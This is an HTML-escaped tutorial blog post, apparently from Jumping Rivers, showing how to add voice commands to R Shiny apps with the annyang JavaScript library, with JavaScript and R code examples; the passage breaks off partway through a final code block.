&lt;p&gt;I love R and I love &lt;a href="https://shiny.rstudio.com/gallery/" rel="external"&gt;Shiny&lt;/a&gt;. One of the things I really like about shiny is the ease with which you can incorporate other Javascript based tools and libraries. By my own admission, my &lt;a href="https://en.wikipedia.org/wiki/JavaScript" rel="external"&gt;JavaScript&lt;/a&gt; skills are definitely lacking but there are so many cool libraries out there which can really make visualisation and interaction with displayed content come alive. One such library I came across about a while ago now is &lt;a href="https://www.talater.com/annyang/" rel="external"&gt;annyang&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-voice-control-your-shiny-apps"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-annyang"&gt;What is annyang?&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;“annyang is a tiny javascript library that lets your visitors control your site with voice commands. annyang supports multiple languages, has no dependencies, weighs just 2kb and is free to use.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Annyang works with all browsers that implement the speech recognition interface of the Web Speech API and makes it extremely easy to get started. Here is some JavaScript that you can include inside raw HTML to add a voice command that listens for the phrase &lt;strong&gt;Jumping Rivers&lt;/strong&gt; and takes you to our &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;home page&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;script src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#f85149"&gt;/script&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;script&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// detect whether it is supported in the browser
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// define some commands
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// on hearing &amp;#34;Jumping Rivers&amp;#34;, call this function
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Jumping Rivers&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.open(&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://www.jumpingrivers.com&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;_blank&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// register the defined commands
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// start listening
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#f85149"&gt;/script&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="more-complex-commands"&gt;More complex commands&lt;/h3&gt;
&lt;p&gt;In addition to explicit phrases like the above, annyang can also understand named variables, optional phrases and multi-word text (splats). I refer you to the guides on the &lt;a href="https://www.talater.com/annyang/" rel="external"&gt;annyang page&lt;/a&gt; for further info.&lt;/p&gt;
&lt;h2 id="include-it-in-shiny"&gt;Include it in Shiny&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note: This will not function in the RStudio browser if you run the code yourself open the app in another browser, preferably Chrome. You will likely have to give permission to the browser to use the microphone too.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Shiny makes it easy to include snippets of Javascript code in your apps through the HTML &lt;code&gt;tags&lt;/code&gt;. We could include the above command into a Shiny app with the following code&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple Shiny App - just say &amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; if(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; var commands = {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;Jumping Rivers&amp;#39; : function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; window.open(&amp;#39;https://www.jumpingrivers.com&amp;#39;, &amp;#39;_blank&amp;#39;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s potentially easier to keep your JavaScript file separate and include it using &lt;code&gt;includeScript()&lt;/code&gt; in your ui.R. So we have two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;voice.js&lt;/strong&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Jumping Rivers&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.open(&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://www.jumpingrivers.com&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;_blank&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;app.R&lt;/strong&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeScript&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;voice.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://jumpingrivers.shinyapps.io/speech/" rel="external"&gt;Shiny App&lt;/a&gt; in action.&lt;/p&gt;
&lt;h3 id="what-about-changing-r-variables"&gt;What about changing R variables?&lt;/h3&gt;
&lt;p&gt;Now I think that by itself is kind of cool. But it would be much more useful if we could use this to interact with R objects. Fortunately Shiny makes this possible too. The Javascript &lt;code&gt;Shiny.onInputChange('var', value)&lt;/code&gt; function can be used to set a &lt;code&gt;value&lt;/code&gt; on a reactive under &lt;code&gt;input$var&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As a simple example, let&amp;rsquo;s create a counter that increments when I say &lt;strong&gt;“Count”&lt;/strong&gt;. Our &lt;code&gt;voice.js&lt;/code&gt; file would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;count&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;+=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Shiny.onInputChange(&lt;span style="color:#a5d6ff"&gt;&amp;#39;counter&amp;#39;&lt;/span&gt;, value);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and a Shiny app that displays the counter might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeScript&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;voice.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;counter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Check out the end result &lt;a href="https://jumpingrivers.shinyapps.io/Speech2/" rel="external"&gt;app&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="but-i-dont-know-any-javascript-and-dont-want-to-know"&gt;But I don’t know any Javascript and don’t want to know&lt;/h2&gt;
&lt;p&gt;The above is all well and good if you are happy to write the JavaScript code for each of your apps. But if you really don’t want to or don’t feel comfortable doing that then we could define an R function which registers a keyword to start listening (think Alexa), takes all the spoken word after the keyword and stores the string as an R object. This way all processing of the result can be done in the comfort of the R language. One such implementation of this using the annyang splat is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# I have used the keyword jarvis as default because I like iron man&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# default value is an empty string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# necessary to choose an &amp;#34;inputId&amp;#34; to bind the value to&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;voiceInput &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(inputId, keyword &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jarvis&amp;#34;&lt;/span&gt;, value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;annyang.start({ autoRestart: true, continuous: true});&amp;#34;&lt;/span&gt;)))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;var &amp;lt;inputId&amp;gt; = &amp;#39;&amp;#39;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; if(annyang){
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; var commands = {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;&amp;lt;keyword&amp;gt; *val&amp;#39;: function(val) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;lt;inputId&amp;gt; = val;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.onInputChange(&amp;#39;&amp;lt;inputId&amp;gt;&amp;#39;, &amp;lt;inputId&amp;gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }&amp;#34;&lt;/span&gt;, .open &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;lt;&amp;#34;&lt;/span&gt;, .close &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
